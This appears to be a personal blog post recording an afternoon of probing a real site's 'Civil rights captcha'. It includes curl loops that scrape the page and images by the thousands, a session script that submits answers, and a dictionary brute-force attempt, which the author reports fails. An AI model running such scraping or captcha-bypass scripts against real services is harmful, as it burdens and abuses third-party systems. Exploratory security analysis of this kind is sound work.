laura says hi - from chile

Warning - nerdy content I spent a lazy afternoon back in Dublin pulling apart Civil rights captcha, and I wanted to save my notes by sticking them on the blog.

Background

Civil rights captcha is a system that aims to educate people on civil rights as well as tell humans from robots.

Note that wired and therefore hacker news talk about filtering out internet idiots with this, which isn't mentioned on their site.

how secure is this?

First idea - they only have a few questions. I think each question takes a human to come up with it and review it.They can't really raise civil rights awareness with a incorrect collection of ills and they don't want to be sued for libel.

Download the page 1000 times.

for x in {0..1000}; do
  curl -s -o dataset/$x captcha.civilrightsdefenders.org
  done

Compare them to one another.

for x in dataset/*; do
  diff dataset/0 $x | egrep '>'
done | sort | uniq > questions

They have given 8 questions. Theories as to why:

they only have 8 questions.
they shard questions by IP or user agent. For example, they might only give curl users 8 questions.

They might also have many correct answers per question. With a normal captcha you only have one correct answer.

How many answers are there? Use chrome to grab a image url. Use curl to hit that url a few times. Each file has a different sha1sum (it would be nice to have a command line tool that uses a cheaper hash), so possibly a bug in the loop or a different image. Download 1000 images.

mkdir images
for x in {0..10000}; do
  curl -s -o images/$x 'http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=xJZNm2G1mK5TQQH69mX3&newset=7&lang=en';
done

Hash all the images, see 1003 different hashes. Ideas:

different words
different lines over each word.
some sort of salting in the image to defeat hashing
bug in the loop.

Look at the images. Lots of different words, some negative, some positive. Some dupe words, but not many. Download 6k images. All of them are different.

Peer at chrome's debugger. Watch the process. The javascript fetches one image with newset=1, and two more without the newset parameter. Each request has a sid parameter set to a random string. The random string is different for each image. The newset request sets a cookie, which is sent back to the server. Example cookie:

Set-Cookie: PHPSESSID=eq0llt1rjtfr0h3fa0mlorrm67; path=/

Random string notes: its not clear what purpose the random string serves. If I had to guess, it prevents http caching.

Once the user enters a answer, it does validation with a request like so.

curl --cookie 'PHPSESSID=e66bfeidg9ukm1ovvk9cn1i8f6'
'http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=concerned'

result:

jQuery1({"answer":"false"});

So it presumably stores a map of session to correct answer on the server side, and returns a json blob if the user's input is correct.

Code for a session

set -eux
session_id=$RANDOM
dir=session-$session_id
mkdir $dir
random=$(printf "%06daaaaaaaaaaaaaa" $session_id)
curl -s -o $dir/1.png --dump-header $dir/1.headers
"http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${random}&newset=1&lang

cookie=$(awk '/Set-Cookie:/{print $2}' session/1.headers | tr -d ';')
awk '/Set-Cookie:/{print $2}' $dir/1.headers
curl --cookie "$cookie" -s -o $dir/2.png --dump-header $dir/2.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${ra
curl --cookie "$cookie" -s -o $dir/3.png --dump-header $dir/3.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${ra

echo $dir
echo 'work out the answer'
read answer

curl -s --dump-header $dir/answer.headers --cookie "$cookie" "http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=${answer}"

Can this be brute forced?

Start out by sending the contents of /usr/share/dict/british-english

% wc -l /usr/share/dict/british-english
99156 /usr/share/dict/british-english

It takes 30s to test 100 words. So to test british-english would take 8 hours. New plan: find a list of words for emotions on the internet. like so.

~700 words, so under 5m to test them all. Doesn't work.
How about solving the captcha, verifying it, then sending 10 verify requests for random words, then trying to verify the correct answer again? Fails.
How about trying a random word, then trying the correct answer? Fails.
How about trying the correct answer twice? Works both times.

Even though the key space is quite small, O(100)s of words, brute forcing is hard because any false answer drops the session.

Conclusion

This is more robust than I expected. A lot of the attacks I expected to work don't work. There are fairly few questions, but the questions don't matter. There are O(100s) of text answers, but its generating a new image for each request, meaning that there isn't any point in solving the images offline (or spending time trying to use their site as a oracle for the images). It reduces down to the normal image captcha problem - OCRing images online. Its also probably vulnerable to dos attacks on opening many sessions.

Post-script: actually reading their docs shows that its based on php captcha.

The rest of the blog

16 Dec 2012 » Civil rights Captcha

Background

how secure is this?

Can this be brute forced?

Conclusion